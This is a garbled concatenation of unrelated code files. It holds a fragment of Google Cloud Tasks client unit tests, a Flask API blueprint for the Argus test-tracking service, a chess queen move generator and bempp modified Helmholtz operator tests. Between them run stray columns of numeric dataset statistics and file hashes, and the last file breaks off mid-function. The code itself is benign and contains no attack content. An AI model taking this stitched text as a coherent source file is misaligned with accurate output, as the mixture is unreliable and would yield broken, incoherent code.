def test_cloud_tasks_host_with_port():
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="cloudtasks.googleapis.com:8000"
),
)
assert client._transport._host == "cloudtasks.googleapis.com:8000"
def test_cloud_tasks_grpc_transport_channel():
channel = grpc.insecure_channel("http://localhost/")
# Check that if channel is provided, mtls endpoint and client_cert_source
# won't be used.
callback = mock.MagicMock()
transport = transports.CloudTasksGrpcTransport(
host="squid.clam.whelk",
channel=channel,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=callback,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert not callback.called
def test_cloud_tasks_grpc_asyncio_transport_channel():
channel = aio.insecure_channel("http://localhost/")
# Check that if channel is provided, mtls endpoint and client_cert_source
# won't be used.
callback = mock.MagicMock()
transport = transports.CloudTasksGrpcAsyncIOTransport(
host="squid.clam.whelk",
channel=channel,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=callback,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert not callback.called
@mock.patch("grpc.ssl_channel_credentials", autospec=True)
@mock.patch("google.api_core.grpc_helpers.create_channel", autospec=True)
def test_cloud_tasks_grpc_transport_channel_mtls_with_client_cert_source(
grpc_create_channel, grpc_ssl_channel_cred
):
# Check that if channel is None, but api_mtls_endpoint and client_cert_source
# are provided, then a mTLS channel will be created.
mock_cred = mock.Mock()
mock_ssl_cred = mock.Mock()
grpc_ssl_channel_cred.return_value = mock_ssl_cred
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
transport = transports.CloudTasksGrpcTransport(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=client_cert_source_callback,
)
grpc_ssl_channel_cred.assert_called_once_with(
certificate_chain=b"cert bytes", private_key=b"key bytes"
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
credentials_file=None,
scopes=("https://www.googleapis.com/auth/cloud-platform",),
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
)
assert transport.grpc_channel == mock_grpc_channel
@mock.patch("grpc.ssl_channel_credentials", autospec=True)
@mock.patch("google.api_core.grpc_helpers_async.create_channel", autospec=True)
def test_cloud_tasks_grpc_asyncio_transport_channel_mtls_with_client_cert_source(
grpc_create_channel, grpc_ssl_channel_cred
):
# Check that if channel is None, but api_mtls_endpoint and client_cert_source
# are provided, then a mTLS channel will be created.
mock_cred = mock.Mock()
mock_ssl_cred = mock.Mock()
grpc_ssl_channel_cred.return_value = mock_ssl_cred
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
transport = transports.CloudTasksGrpcAsyncIOTransport(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=client_cert_source_callback,
)
grpc_ssl_channel_cred.assert_called_once_with(
certificate_chain=b"cert bytes", private_key=b"key bytes"
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
credentials_file=None,
scopes=("https://www.googleapis.com/auth/cloud-platform",),
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
)
assert transport.grpc_channel == mock_grpc_channel
@pytest.mark.parametrize(
"api_mtls_endpoint", ["mtls.squid.clam.whelk", "mtls.squid.clam.whelk:443"]
)
@mock.patch("google.api_core.grpc_helpers.create_channel", autospec=True)
def test_cloud_tasks_grpc_transport_channel_mtls_with_adc(
grpc_create_channel, api_mtls_endpoint
):
# Check that if channel and client_cert_source are None, but api_mtls_endpoint
# is provided, then a mTLS channel will be created with SSL ADC.
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
# Mock google.auth.transport.grpc.SslCredentials class.
mock_ssl_cred = mock.Mock()
with mock.patch.multiple(
"google.auth.transport.grpc.SslCredentials",
__init__=mock.Mock(return_value=None),
ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
):
mock_cred = mock.Mock()
transport = transports.CloudTasksGrpcTransport(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint=api_mtls_endpoint,
client_cert_source=None,
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
credentials_file=None,
scopes=("https://www.googleapis.com/auth/cloud-platform",),
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
)
assert transport.grpc_channel == mock_grpc_channel
@pytest.mark.parametrize(
"api_mtls_endpoint", ["mtls.squid.clam.whelk", "mtls.squid.clam.whelk:443"]
)
@mock.patch("google.api_core.grpc_helpers_async.create_channel", autospec=True)
def test_cloud_tasks_grpc_asyncio_transport_channel_mtls_with_adc(
grpc_create_channel, api_mtls_endpoint
):
# Check that if channel and client_cert_source are None, but api_mtls_endpoint
# is provided, then a mTLS channel will be created with SSL ADC.
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
# Mock google.auth.transport.grpc.SslCredentials class.
mock_ssl_cred = mock.Mock()
with mock.patch.multiple(
"google.auth.transport.grpc.SslCredentials",
__init__=mock.Mock(return_value=None),
ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
):
mock_cred = mock.Mock()
transport = transports.CloudTasksGrpcAsyncIOTransport(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint=api_mtls_endpoint,
client_cert_source=None,
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
credentials_file=None,
scopes=("https://www.googleapis.com/auth/cloud-platform",),
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
)
assert transport.grpc_channel == mock_grpc_channel
def test_task_path():
project = "squid"
location = "clam"
queue = "whelk"
task = "octopus"
expected = "projects/{project}/locations/{location}/queues/{queue}/tasks/{task}".format(
project=project, location=location, queue=queue, task=task,
)
actual = CloudTasksClient.task_path(project, location, queue, task)
assert expected == actual
def test_parse_task_path():
expected = {
"project": "oyster",
"location": "nudibranch",
"queue": "cuttlefish",
"task": "mussel",
}
path = CloudTasksClient.task_path(**expected)
# Check that the path construction is reversible.
actual = CloudTasksClient.parse_task_path(path)
assert expected == actual
def test_queue_path():
project = "squid"
location = "clam"
queue = "whelk"
expected = "projects/{project}/locations/{location}/queues/{queue}".format(
project=project, location=location, queue=queue,
)
actual = CloudTasksClient.queue_path(project, location, queue)
assert expected == actual
def test_parse_queue_path():
expected = {
"project": "octopus",
"location": "oyster",
"queue": "nudibranch",
}
path = CloudTasksClient.queue_path(**expected)
# Check that the path construction is reversible.
actual = CloudTasksClient.parse_queue_path(path)
assert expected == actual
def test_client_withDEFAULT_CLIENT_INFO():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(
transports.CloudTasksTransport, "_prep_wrapped_messages"
) as prep:
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(
transports.CloudTasksTransport, "_prep_wrapped_messages"
) as prep:
transport_class = CloudTasksClient.get_transport_class()
transport = transport_class(
credentials=credentials.AnonymousCredentials(), client_info=client_info,
)
prep.assert_called_once_with(client_info)
| 36.561858
| 111
| 0.686378
| 19,051
| 156,631
| 5.444806
| 0.021574
| 0.017276
| 0.028073
| 0.017276
| 0.947613
| 0.937925
| 0.924717
| 0.905774
| 0.893916
| 0.884844
| 0
| 0.004979
| 0.226826
| 156,631
| 4,283
| 112
| 36.570395
| 0.851556
| 0.242691
| 0
| 0.716959
| 0
| 0
| 0.072758
| 0.022262
| 0
| 0
| 0
| 0
| 0.160234
| 1
| 0.046004
| false
| 0
| 0.013645
| 0.00078
| 0.060429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9365d4790bbe98eb6dabb878b1132d53621583a6
| 18,751
|
py
|
Python
|
argus/backend/api.py
|
dkropachev/argus
|
e1d7b6cecb6ffcbcfbf46b6da1346b2f8308cd26
|
[
"Apache-2.0"
] | null | null | null |
argus/backend/api.py
|
dkropachev/argus
|
e1d7b6cecb6ffcbcfbf46b6da1346b2f8308cd26
|
[
"Apache-2.0"
] | null | null | null |
argus/backend/api.py
|
dkropachev/argus
|
e1d7b6cecb6ffcbcfbf46b6da1346b2f8308cd26
|
[
"Apache-2.0"
] | null | null | null |
import logging
from uuid import UUID
from flask import (
Blueprint,
request
)
from flask.json import jsonify
from argus.backend.argus_service import ArgusService
from argus.backend.auth import login_required
# pylint: disable=broad-except
bp = Blueprint('api', __name__, url_prefix='/api/v1')
LOGGER = logging.getLogger(__name__)
@bp.route("/version")
def version():
service = ArgusService()
argus_version = service.get_version()
return jsonify({
"status": "ok",
"response": {
"commit_id": argus_version
}
})
@bp.route("/releases")
@login_required
def releases():
service = ArgusService()
all_releases = service.get_releases()
return jsonify({
"status": "ok",
"response": [dict(d.items()) for d in all_releases]
})
@bp.route("/release/activity", methods=["POST"])
@login_required
def release_activity():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.fetch_release_activity(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/release/schedules", methods=["POST"])
@login_required
def release_schedules():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.get_schedules_for_release(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/release/schedules/today/assignees", methods=["POST"])
@login_required
def release_schedules_today_assignees():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.get_assignees(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/release/schedules/submit", methods=["POST"])
@login_required
def release_schedules_submit():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.submit_new_schedule(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/release/schedules/delete", methods=["POST"])
@login_required
def release_schedules_delete():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.delete_schedule(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/release/issues", methods=["POST"])
@login_required
def release_issues():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.fetch_release_issues(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/release_groups", methods=["POST"])
@login_required
def release_groups():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
groups = service.get_groups_for_release(
UUID(request_payload["release"]["id"]))
res["response"] = [dict(g.items()) for g in groups]
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/tests", methods=["POST"])
@login_required
def tests():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
release_group_tests = service.get_tests_for_release_group(
group_id=request_payload["group"]["id"])
res["response"] = {"tests": [dict(t.items()) for t in release_group_tests]}
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/tests/last_status", methods=["POST"])
@login_required
def tests_last_status():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.get_test_last_run_status(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/test_runs", methods=["POST"])
@login_required
def test_runs():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
release_group_runs = service.get_runs_by_name_for_release_group(
release_name=request_payload["release"],
test_name=request_payload["test_name"],
limit=request_payload.get("limit", 10)
)
res["response"] = release_group_runs
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/test_run", methods=["POST"])
@login_required
def test_run():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
loaded_run = service.load_test_run(
test_run_id=UUID(request_payload["test_id"]))
res["response"] = loaded_run.serialize()
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/test_run/comments", methods=["POST"])
@login_required
def test_run_comments():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
comments = service.get_comments(
test_id=UUID(request_payload["test_id"]))
res["response"] = [dict(c.items()) for c in comments]
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/test_run/comments/submit", methods=["POST"])
@login_required
def test_run_submit_comment():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
result = service.post_comment(payload=request_payload)
res["response"] = [dict(c.items()) for c in result]
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/users", methods=["POST"])
@login_required
def user_info():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
service = ArgusService()
result = service.get_user_info()
res["response"] = result
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/stats", methods=["POST"])
@login_required
def run_stats():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.collect_stats(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/test_runs/poll", methods=["POST"])
@login_required
def test_runs_poll():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.poll_test_runs(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/test_run/poll", methods=["POST"])
@login_required
def test_run_poll_single():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.poll_test_runs_single(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/test_run/change_status", methods=["POST"])
@login_required
def test_run_change_status():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.toggle_test_status(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/test_run/change_assignee", methods=["POST"])
@login_required
def test_run_change_assignee():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.change_assignee(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/test_run/activity", methods=["POST"])
@login_required
def test_run_activity():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.fetch_run_activity(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/release/create", methods=["POST"])
@login_required
def release_create():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.create_release(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/issues/submit", methods=["POST"])
@login_required
def issues_submit():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.submit_github_issue(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/issues/get", methods=["POST"])
@login_required
def issues_get():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.get_github_issues(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
@bp.route("/issues/state", methods=["POST"])
@login_required
def issues_state():
res = {
"status": "ok"
}
try:
if not request.is_json:
raise Exception(
"Content-Type mismatch, expected application/json, got:", request.content_type)
request_payload = request.get_json()
service = ArgusService()
res["response"] = service.get_github_issue_state(request_payload)
except Exception as exc:
LOGGER.error("Something happened during request %s", request)
res["status"] = "error"
res["response"] = {
"exception": exc.__class__.__name__,
"arguments": exc.args
}
return jsonify(res)
| 31.044702
| 95
| 0.599488
| 1,979
| 18,751
| 5.438605
| 0.05811
| 0.040138
| 0.037164
| 0.053517
| 0.877822
| 0.867416
| 0.835362
| 0.796339
| 0.778036
| 0.778036
| 0
| 0.000221
| 0.276359
| 18,751
| 603
| 96
| 31.096186
| 0.792984
| 0.001493
| 0
| 0.715328
| 0
| 0
| 0.216174
| 0.008386
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047445
| false
| 0
| 0.010949
| 0
| 0.105839
| 0.00365
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
93821324686b194a0973439dcb99a4917275df88
| 2,031
|
py
|
Python
|
pieces/queen.py
|
nherbert25/chess_test
|
5cebe4d57c9a1bdc073925079f8530ad900041c9
|
[
"MIT"
] | null | null | null |
pieces/queen.py
|
nherbert25/chess_test
|
5cebe4d57c9a1bdc073925079f8530ad900041c9
|
[
"MIT"
] | null | null | null |
pieces/queen.py
|
nherbert25/chess_test
|
5cebe4d57c9a1bdc073925079f8530ad900041c9
|
[
"MIT"
] | null | null | null |
from pieces.piece import Piece
class Queen(Piece):
alliance = None
position = None
name = 'queen'
def __init__(self, alliance, position):
Piece.__init__(self, alliance)
self.alliance = alliance
self.position = position
def toString(self):
return("Q" if self.alliance == "Black" else "q")
def movement(self, original_position):
potential_legal_moves = []
potential_legal_moves.append([])
test_position = original_position-1
while test_position%8 < original_position % 8:
potential_legal_moves[0].append(test_position)
test_position -= 1
potential_legal_moves.append([])
test_position = original_position+1
while test_position%8 > original_position % 8:
potential_legal_moves[1].append(test_position)
test_position += 1
potential_legal_moves.append([])
test_position = original_position-8
while test_position >= 0:
potential_legal_moves[2].append(test_position)
test_position -= 8
potential_legal_moves.append([])
test_position = original_position+8
while test_position <= 63:
potential_legal_moves[3].append(test_position)
test_position += 8
potential_legal_moves.append([])
test_position = original_position-9
while test_position >= 0 and test_position % 8 < original_position % 8:
potential_legal_moves[4].append(test_position)
test_position -= 9
potential_legal_moves.append([])
test_position = original_position-7
while test_position >= 0 and test_position % 8 > original_position % 8:
potential_legal_moves[5].append(test_position)
test_position -= 7
potential_legal_moves.append([])
test_position = original_position+9
while test_position <= 63 and test_position % 8 > original_position % 8:
potential_legal_moves[6].append(test_position)
test_position += 9
potential_legal_moves.append([])
test_position = original_position+7
while test_position <= 63 and test_position % 8 < original_position % 8:
potential_legal_moves[7].append(test_position)
test_position += 7
return(potential_legal_moves)
| 29.867647
| 74
| 0.753816
| 270
| 2,031
| 5.318519
| 0.144444
| 0.300836
| 0.238162
| 0.139276
| 0.768802
| 0.768802
| 0.725627
| 0.725627
| 0.725627
| 0.725627
| 0
| 0.026072
| 0.150172
| 2,031
| 68
| 75
| 29.867647
| 0.80591
| 0
| 0
| 0.148148
| 0
| 0
| 0.005906
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.018519
| 0.018519
| 0.148148
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4f0560f751cb6660590760da9ee4bff9596b1a27
| 8,079
|
py
|
Python
|
test/validation/operators/boundary/test_modified_helmholtz.py
|
pescap/bempp-cl
|
3a68666e8db0e873d418b734289067483f68f12e
|
[
"MIT"
] | null | null | null |
test/validation/operators/boundary/test_modified_helmholtz.py
|
pescap/bempp-cl
|
3a68666e8db0e873d418b734289067483f68f12e
|
[
"MIT"
] | null | null | null |
test/validation/operators/boundary/test_modified_helmholtz.py
|
pescap/bempp-cl
|
3a68666e8db0e873d418b734289067483f68f12e
|
[
"MIT"
] | null | null | null |
"""Unit tests for modified Helmholtz operators."""
# pylint: disable=redefined-outer-name
# pylint: disable=C0103
import numpy as _np
import pytest
pytestmark = pytest.mark.usefixtures("default_parameters", "helpers")
OMEGA = 2.5
def test_modified_helmholtz_single_layer(
default_parameters, helpers, precision, device_interface
):
"""Test dense assembler for modified Helmholtz."""
from bempp.api import function_space
from bempp.api.operators.boundary.modified_helmholtz import single_layer
grid = helpers.load_grid("sphere")
space = function_space(grid, "P", 1)
discrete_op = single_layer(
space,
space,
space,
OMEGA,
assembler="dense",
precision=precision,
device_interface=device_interface,
parameters=default_parameters,
).weak_form()
# Bempp 3 assembles modified Helmholtz as complex type, so cast to real.
expected = _np.real(
helpers.load_npy_data("modified_helmholtz_single_layer_boundary")
)
_np.testing.assert_allclose(
discrete_op.A, expected, rtol=helpers.default_tolerance(precision)
)
def test_modified_helmholtz_double_layer_p1_cont(
default_parameters, helpers, precision, device_interface
):
"""Test dense assembler for the modified Helmholtz dlp."""
from bempp.api import function_space
from bempp.api.operators.boundary.modified_helmholtz import double_layer
grid = helpers.load_grid("sphere")
space = function_space(grid, "P", 1)
discrete_op = double_layer(
space,
space,
space,
OMEGA,
assembler="dense",
precision=precision,
device_interface=device_interface,
parameters=default_parameters,
).weak_form()
expected = _np.real(
helpers.load_npy_data("modified_helmholtz_double_layer_boundary")
)
_np.testing.assert_allclose(
discrete_op.A, expected, rtol=helpers.default_tolerance(precision)
)
def test_modified_helmholtz_adjoint_double_layer(
default_parameters, helpers, precision, device_interface
):
"""Test dense assembler for the Helmholtz adjoint dlp."""
from bempp.api import function_space
from bempp.api.operators.boundary.modified_helmholtz import adjoint_double_layer
grid = helpers.load_grid("sphere")
space = function_space(grid, "P", 1)
discrete_op = adjoint_double_layer(
space,
space,
space,
OMEGA,
assembler="dense",
precision=precision,
device_interface=device_interface,
parameters=default_parameters,
).weak_form()
expected = _np.real(
helpers.load_npy_data("modified_helmholtz_adj_double_layer_boundary")
)
_np.testing.assert_allclose(
discrete_op.A, expected, rtol=helpers.default_tolerance(precision)
)
def test_modified_helmholtz_hypersingular(
default_parameters, helpers, precision, device_interface
):
"""Test dense assembler for the modified Helmholtz hypersingular operator."""
from bempp.api import function_space
from bempp.api.operators.boundary.modified_helmholtz import hypersingular
grid = helpers.load_grid("sphere")
space = function_space(grid, "P", 1)
discrete_op = hypersingular(
space,
space,
space,
OMEGA,
assembler="dense",
precision=precision,
device_interface=device_interface,
parameters=default_parameters,
).weak_form()
expected = _np.real(
helpers.load_npy_data("modified_helmholtz_hypersingular_boundary")
)
_np.testing.assert_allclose(
discrete_op.A, expected, rtol=helpers.default_tolerance(precision)
)
# def test_modified_helmholtz_single_layer_evaluator(
# default_parameters, helpers, precision, device_interface
# ):
# """Test dense evaluator for modified Helmholtz slp."""
# from bempp.api import function_space
# from bempp.api.operators.boundary.modified_helmholtz import single_layer
# grid = helpers.load_grid("sphere")
# space = function_space(grid, "P", 1)
# discrete_op = single_layer(
# space,
# space,
# space,
# OMEGA,
# assembler="dense_evaluator",
# precision=precision,
# device_interface=device_interface,
# parameters=default_parameters,
# ).weak_form()
# mat = single_layer(
# space,
# space,
# space,
# OMEGA,
# assembler="dense",
# precision=precision,
# device_interface=device_interface,
# parameters=default_parameters,
# ).weak_form()
# x = _np.random.RandomState(0).randn(space.global_dof_count)
# actual = discrete_op @ x
# expected = mat @ x
# if precision == "single":
# tol = 1e-4
# else:
# tol = 1e-12
# _np.testing.assert_allclose(actual, expected, rtol=tol)
# def test_modified_helmholtz_double_layer_evaluator(
# default_parameters, helpers, precision, device_interface
# ):
# """Test dense evaluator for modified Helmholtz dlp."""
# from bempp.api import function_space
# from bempp.api.operators.boundary.modified_helmholtz import double_layer
# grid = helpers.load_grid("sphere")
# space = function_space(grid, "P", 1)
# discrete_op = double_layer(
# space,
# space,
# space,
# OMEGA,
# assembler="dense_evaluator",
# precision=precision,
# device_interface=device_interface,
# parameters=default_parameters,
# ).weak_form()
# mat = double_layer(
# space,
# space,
# space,
# OMEGA,
# assembler="dense",
# precision=precision,
# device_interface=device_interface,
# parameters=default_parameters,
# ).weak_form()
# x = _np.random.RandomState(0).randn(space.global_dof_count)
# actual = discrete_op @ x
# expected = mat @ x
# if precision == "single":
# tol = 1e-4
# else:
# tol = 1e-12
# _np.testing.assert_allclose(actual, expected, rtol=tol)
# def test_modified_helmholtz_adj_double_layer_evaluator(
# default_parameters, helpers, precision, device_interface
# ):
# """Test dense evaluator for modified Helmholtz adj dlp."""
# from bempp.api import function_space
# from bempp.api.operators.boundary.modified_helmholtz import adjoint_double_layer
# grid = helpers.load_grid("sphere")
# space = function_space(grid, "P", 1)
# discrete_op = adjoint_double_layer(
# space,
# space,
# space,
# OMEGA,
# assembler="dense_evaluator",
# precision=precision,
# device_interface=device_interface,
# parameters=default_parameters,
# ).weak_form()
# mat = adjoint_double_layer(
# space,
# space,
# space,
# OMEGA,
# assembler="dense",
# precision=precision,
# device_interface=device_interface,
# parameters=default_parameters,
# ).weak_form()
# x = _np.random.RandomState(0).randn(space.global_dof_count)
# actual = discrete_op @ x
# expected = mat @ x
# if precision == "single":
# tol = 1e-4
# else:
# tol = 1e-12
# _np.testing.assert_allclose(actual, expected, rtol=tol)
# def test_modified_helmholtz_hypersingular_evaluator(
# default_parameters, helpers, precision, device_interface
# ):
# """Test dense evaluator for modified Helmholtz hypersingular."""
